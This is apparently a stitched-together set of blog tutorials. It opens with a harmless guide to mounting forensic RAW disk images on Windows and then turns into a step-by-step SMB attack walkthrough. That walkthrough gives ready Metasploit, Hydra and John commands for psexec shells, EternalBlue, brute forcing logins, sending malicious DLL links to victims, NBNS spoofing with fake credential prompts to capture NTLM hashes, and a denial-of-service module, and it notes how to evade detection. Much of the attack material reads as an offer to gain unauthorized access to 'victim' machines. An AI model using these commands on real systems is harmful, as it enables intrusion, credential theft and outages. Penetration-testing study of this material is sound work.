3 Ways to Mount a RAW Image in Windows

In Forensic, to investigate a hard drive or disks we always make a forensic image. A Forensic Image is a forensically sound and complete copy of a hard drive or other digital media, generally intended for use as evidence. Copies include unallocated space, slack space, and boot record.  Many computer forensic programs, especially the all-in-one suites, use their own file formats to store information. These images are stored in a format of RAW file or AFF or E01.

RAW Image Format: This format is a RAW bit-by-bit copy of the original. It is often accompanied by Meta data stored in separate formats. This Image Format is most common used and is read by every Forensic tool in the industry.

Once the RAW image is created, it can't be read unless it is mounted by a tool. Mount is the process that will take the raw logical image and mount it onto a specified directory of choice to be able to examine the contents of that image. The image has to include be a recognizable file system as a partition. This makes invocation of the command interesting as the raw image is a physical disk image and not a specific partition of a file system.

Mount an image for a read-only view that leverages to see the content of the image exactly as the user saw it on the original drive.

There are various methods to mount a RAW file. But before we learn how to mount our RAW files, just have look on your my computer so that you can have a idea about how many drives you have before mounting a RAW file. For instance, following is the image of my computer of my PC:

Now, Let us have a look on these methods :

Forensic Tool Kit Imager

FTK Imager (version - 3.4.2) is tool introduced by Access Data which is used to preview data. It is also an imaging tool that lets us acquire in a forensically sound way. FTK helps us to create forensic images, Mount an image for a read-only view, Create hashes of files, etc and right now we will focus on its Mount function. To mount a RAW image file via FTK, first of all download FTK from --> http://accessdata.com/product-download/digital-forensics/ftk-imager-version-3.4.2

Now that FTK is downloaded and installed, open it and click on Files on the menu bar. A drop down menu will appear, from this menu click on Image Mounting.

A dialogue box will open now. Give the path of RAW file in Image File option and click on Mount button.

Once you click on Mount button your image will be mounted and you can see result in Mapped images:

OSFMount

OSFMount (version - 1.5.1015) is software by PassMark Software’s. It helps you mount your image files even your hard disk image file in windows with a drive letter. You can then analyze the disk image files further. For your original files not to be altered, the image files are mounted as read only by default. Download this software from --> http://www.osforensics.com/tools/mount-disk-images.html

Open OSFMount after the instalation is completed open it:

Go to File menu and select Mount new virtual disk option.

Dialogues will open; here give the path of your image file under the heading Image file and click on OK.

You can see in the following image that your RAW image will be mounted as a result:

Mount Image Pro

Get Data is a software development company that has launched Mount Image Pro (version - 6). It is a computer forensic tool which enables us to mount an image for forensic purpose. You can download this software from http://www.mountimage.com/

Open the software after its installation.

Go to File menu and click on Mount Image File.

A dialogue box will open and select your image file from it.

And then another dialogue box will open informing you with all the details. Click on OK.

It will further show you the progress in another dialogue box.

And as the outcome you can see that your image file will mount as shown in following image:

Now, as i had asked you to check you’re my computer before mounting the image, similarly, you can again check my computer and you will an extra drive as shown below:

4 ways to Connect Remote PC using SMB Port

To understand what is SMB protocol, click here

To know how collect username and passwords to your remote host via SMB protocol, click here

In this article, we will learn how to exploit your remote PC once you have collected username and password to your victim's PC. There are four ways to do so and they all are listed below:

Microsoft Windows Authenticated User Code Execution

This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the "psexec" utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.

msf > use exploit/windows/smb/psexec

msf exploit(psexec) > set rhost 192.168.0.104

msf exploit(psexec) > set rport 445

msf exploit(psexec) > set smbuser administrator

msf exploit(psexec) > set smbpass Ignite@123

msf exploit(psexec) > exploit

Here,

rhost --> IP of victim PC

rport --> port through which we are attacking

smbuser --> username

smbpass --> password

Once the commands run you will gain a meterpreter session of your victim's PC and so you can access it as you want.

Microsoft Windows Authenticated Powershell Command Execution

This module uses a valid administrator username and password to execute a powershell payload using a similar technique to the "psexec" utility provided by SysInternals. The payload is encoded in base64 and executed from the commandline using the –encoded command flag. Using this method, the payload is never written to disk, and given that each payload is unique, is less prone to signature based detection. A persist option is provided to execute the payload in a while loop in order to maintain a form of persistence. In the event of a sandbox observing PSH execution, a delay and other obfuscation may be added to avoid detection. In order to avoid interactive process notifications for the current user, the psh payload has been reduced in size and wrapped in a powershell invocation which hides the window entirely.

msf > use exploit/windows/smb/psexec_psh

msf exploit(psexec_psh) > set rhost 192.168.0.104

msf exploit(psexec_psh) > set rport 445

msf exploit(psexec_psh) > set smbuser administrator

msf exploit(psexec_psh) > set smbpass Ignite@123

msf exploit(psexec_psh) > exploit

Once again as the commands run you will gain a meterpreter sesion of victim's PC. And therefore, you can do as you desire.

Atelier Web Remote Commander

This is graphical software that let us gain control of victim's PC that too quite easily.

Once you have open the software give the IP address of your victim's PC in remote host box along with the username and password in their respective boxes. And then click on connect; the whole victim's PC's screen will appear on your Desktop and you will have pretty good view of what your victim is doing.

Psexec.exe

Psexec.exe is software that helps us to access other computers in a network. This software directly takes us to the shell of the remote PC with advantage of doing nothing manually. Download this software from --> http://download.sysinternals.com/files/PSTools.zip.

Unzip the file once you have downloaded it. Go to you command prompt and type:

\\192.168.0.106 -u administrator -p Ignite@123 cmd

Here,

192.168.0.106 --> is the IP of remoste host

-u --> denotes username

-p --> denotes password

cmd --> to enter victim's command prompt

Password Cracking: SMB

Penetration Testing in SMB Protocol

In this article, we will learn how to gain control over our victim’s PC through SMB Port. There are various ways to do it and let take time and learn all those, because different circumstances call for different measure.

Table of Content

Introduction to SMB Protocol

·         Working of SMB

·         Versions of Windows SMB

·         SMB Protocol Security 

SMB Enumeration

Scanning Vulnerability

Multiple Ways to Exploit SMB

·         Eternal Blue

·         SMB login via Brute Force

·         PSexec to connect SMB

·         Rundll32 One-liner to Exploit SMB

·         SMB Exploit via NTLM Capture

SMB DOS-Attack

Post Exploitation

File Sharing

·         smbserver.py

·         smbclient

Introduction to SMB Protocol

Server Message Block (SMB), the modern dialect of which was known as Common Internet File System, operates as an application-layer network protocol for file sharing that allows applications on a computer to read and write to files and to request services from server programs in a computer network. The SMB protocol can be used on top of its TCP/IP protocol or other network protocols. Using the SMB protocol, an application (or the user of an application) can access files or other resources at a remote server. This allows applications to read, create, and update files on the remote server. It can also communicate with any server program that is set up to receive an SMB client request

Working of SMB

SMB functions as a request-response or client-server protocol. The only time that the protocol does not work in a response-request framework is when a client requests an opportunistic lock (oplock) and the server has to break an existing oplock because the current mode is incompatible with the existing oplock. Client computers using SMB connect to a supporting server using NetBIOS over TCP/IP, IPX/SPX, or NetBUI. Once the connection is established, the client computer or program can then open, read/write, and access files similar to the file system on a local computer.

Versions of Windows SMB

CIFS: The old version of SMB, which was included in Microsoft Windows NT 4.0 in 1996.

SMB 1.0 / SMB1: The version used in Windows 2000, Windows XP, Windows Server 2003 and Windows Server 2003 R2.

SMB 2.0 / SMB2: This version used in Windows Vista and Windows Server 2008.

SMB 2.1 / SMB2.1: This version used in Windows 7 and Windows Server 2008 R2.

SMB 3.0 / SMB3: This version used in Windows 8 and Windows Server 2012.

SMB 3.02 / SMB3: This version used in Windows 8.1 and Windows Server 2012 R2.

SMB 3.1: This version used in Windows Server 2016 and Windows 10.

Presently, the latest version of SMB is the SMB 3.1.1 which was introduced with Windows 10 and Windows Server 2016. This version supports AES 128 GCM encryption in addition to AES 128 CCM encryption added in SMB3, and implements pre-authentication integrity check using SHA-512 hash. SMB 3.1.1 also makes secure negotiation mandatory when connecting to clients using SMB 2.x and higher.

SMB Protocol Security 

The SMB protocol supports two levels of security. The first is the share level. The server is protected at this level and each share has a password. The client computer or user has to enter the password to access data or files saved under the specific share. This is the only security model available in the Core and Core plus SMG protocol definitions. User level protection was later added to the SMB protocol. It is applied to individual files and each share is based on specific user access rights. Once a server authenticates the client, he/she is given a unique identification (UID) that is presented upon access to the server. The SMB protocol has supported individual security since LAN Manager 1.0 was implemented.

SMB Enumeration

To identify following information of Windows or Samba system, every pentester go for SMB enumeration during network penertation testing.

§  Banner Grabbing

§  RID cycling

§  User listing

§  Listing of group membership information

§  Share enumeration

§  Detecting if host is in a workgroup or a domain

§  Identifying the remote operating system

§  Password policy retrieval

Here you can observe, we are using nmap the most famous network scanning tool for SMB enumeration.

nmap –p 445 -A 192.168.1.101

As a result, we enumerated following information of the target machine:

Operating System: Windows 7 ultimate

Computer Name & NetBIOS Name: Raj

SMB security mode: SMB 2.02

There are so many automated scripts and tools available for SMB enumeration and if you want to know more about SMB Enumeration then read this article “A Little Guide to SMB Enumeration”.

 Scanning Vulnerability

During enumeration phase, generally we go for banner grabbing to identify version of running service and the host operating system. Once you enumerate this information then you should go for vulnerability scanning phase to identify whether the install service is vulnerable version or patched version.

Nmap serves various scripts to identify state of vulnerability for specific services, similarly it has inbuilt script for SMB to identify its vulnerable state for given target IP.

nmap –script smb-vuln* -p 445 192.168.1.101

As result, it shown the target machine is highly vulnerable to Ms17-010 (eternal blue) due to SMBv1.

To know more about Ms17-010 read complete article “3 ways to scan Eternal Blue Vulnerability in Remote PC”

Multiple Ways to Exploit SMB

Eternal Blue

As we know it is vulnerable to MS17-010 and we can use Metasploit to exploit this machine. Therefore we run the following module which will directly exploit target machine.

use exploit/windows/smb/ms17_010_eternalblue

msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.101

msf exploit(ms17_010_eternalblue) > exploit

Boomm!! We have successfully access remote machine shell as shown in the bellow image.

SMB login via Brute Force

If you get fail to enumerate the vulnerable state of SMB or found patched version of SMB in the target machine, then we have “Brute force” as another option to gain unauthorized access of remote machine.

Here we only need two dictionaries that contains list of username and password in each and a brute forcer tool to make brute force attack.

hydra -L user.txt -P pass.txt 192.168.1.101 smb

-L –> denotes the path of username list

-P –>denote the path of password

Once the commands are executed it will start applying the dictionary attack and so you will have the right username and password in no time. After a few minutes, Hydra cracks the credential, as you can observe that we had successfully grabbed the SMB username as raj and password as 123.

To know more about it, read complete article from here “5 Ways to Hack SMB Login Password”

If you have SMB login credential, then you can use following module to determine what local users exist via the SAM RPC service.

use auxiliary/scanner/smb/smb_enumusers

msf auxiliary(smb_enumusers) > set rhosts 192.168.1.101

msf auxiliary(smb_enumusers) > set smbuser raj

msf auxiliary(smb_enumusers) > set smbpass 123

msf auxiliary(smb_enumusers) > exploit

PSexec - To Connect SMB

Once you have SMB login credential of target machine then with the help of following module of metasploit you can obtain meterpreter session to access remote shell.

use exploit/windows/smb/psexec

msf exploit windows/smb/psexec) > set rhost 192.168.1.101

msf exploit(windows/smb/psexec) > set smbuser raj

msf exploit(windows/smb/psexec) > set smbpass 123

msf exploit(windows/smb/psexec) > exploit

Once the commands run you will gain a meterpreter session of your victim’s PC and so you can access it as you want.

There so many script and tools are available to connect remote machine using SMB protocol, we have already written an article for connecting SMB in multiple ways. Read complete article from here “Multiple ways to Connect Remote PC using SMB Port”.

 Rundll32 One-liner to Exploit SMB

This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. Currently supports DLLs and Powershell.

use exploit/windows/smb/smb_delivery

msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109

msf exploit(windows/smb/smb_delivery) > exploit

This will generate a link for malicious dll file, now send this link to your target and wait for his action.

As soon as victim will run above malicious code inside the run prompt or command prompt, we will get meterpreter session at metasploit.

SMB Exploit via NTLM Capture                                  

Another method to exploit SMB is NTLM hash capture by capturing response password hashes of SMB target machine.

This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. Responses sent by this service have by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel, L0phtcrack or John the ripper (with jumbo patch). To exploit this, the target system must try to authenticate to this module.

use auxiliary/server/capture/smb

msf auxiliary(smb) > set srvhost 192.168.1.109

msf auxiliary(smb) > set johnpwfile /root/Desktop

msf auxiliary(smb) > exploit

Simultaneously run NBNS_response module under capture smb module.

This module forges NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests sent to the local subnet’s broadcast address and spoof a response, redirecting the querying machine to an IP of the attacker’s choosing. Combined with auxiliary/server/capture/smb or auxiliary/server/capture/http_ntlm it is a highly effective means of collecting crackable hashes on common networks. This module must be run as root and will bind to udp/137 on all interfaces.

auxiliary/spoof/nbns/nbns_response

msf auxiliary(nbns_response) > set spoofip 192.168.1.109

msf auxiliary(nbns_response) > set interface eth0

msf auxiliary(nbns_response) >exploit

As result this module will generate a fake window security prompt on victim’s system to establish connection with another system in order to access share folders of that system.

We had use nmap UDP and TCP port scanning command for identifying open ports and protocol and from given image you can observe that port 137 is open for NetBIOS network service in our local machine.

Now when victim will try to access our share folder therefore he will try of connect with us through his network IP, given below image is a proof to demonstrate that victim is connecting malicious IP: 192.168.1.109. When victim will try to access share folder, he will get trap into fake window security alert prompt, which will ask victims to enter his username and password for accessing share folders.

Awesome!! Once again the attacker had captured NTMLv2 hash, from given image you can see that here also the attacker has captured:

Username: raj

Now use john the ripper to crack the ntlmv2 hash by executing given below command

john _smb_netntlmv2

From given below image you can confirm we had successfully retrieved the password: 123 for user: pentest by cracking ntlmv2 hash.

To know more about it read complete article from here “4 Ways to Capture NTLM Hashes in Network”

SMB DOS-Attack

SMB Dos attack is another most excellent method we have in our metasploit framework.

This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and forces a vulnerable client to access the IP of this system as an SMB server. This can be accomplished by embedding a UNC path (\HOST\share\something) into a web page if the target is using Internet Explorer or a Word document otherwise.

use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop

msf auxiliary(ms10_006_negotiate_response_loop) > set srvhost 192.168.1.106

msf auxiliary(ms10_006_negotiate_response_loop) > exploit

Now, when the victim will try to access share folder through our malicious IP, the target machine will get crushed and this attack is very effective.

Post Exploitation

This module will enumerate configured and recently used file shares.

use post/windows/gather/enum_shares

msf post(enum_shares) > set session 1

msf post(enum_shares) > exploit

As you can observe that, here it has shown three UNC paths that have been entered in run dialog.

File Sharing  

Smbexec.py

Now we will use a python script that activates SMB service in our Linux machine. This is useful in the situation where the target machine does NOT have a writeable share available. You can visit to github for this python script.

I copied the python code from github and past it into a text file as smbserver.py in desktop folder. Now execute give below command for a share folder “raj”.

Since we are aware of smb service which is running in host machine 192.168.1.108 and being using window platform we can access it share folder through Run command prompt.

Hence you can observe that we had successfully access folder “raj” and found two text file user and pass in it. In this way we can use smb python script for sharing file between windows and Linux machine.

Smbclient

smbclient is a client that can ‘talk’ to an SMB/CIFS server. It offers an interface similar to that of the ftp program. Operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on.

smbclient –L 192.168.1.108

smbclient //192.168.1.108/raj

As you can observe with the help of smbclient we are able to view share folder of victim’s machine. Moreover we can use smbclient for sharing file in the network. Here you can observe we had login successfully using raj: 123 login and transfer the user.txt file.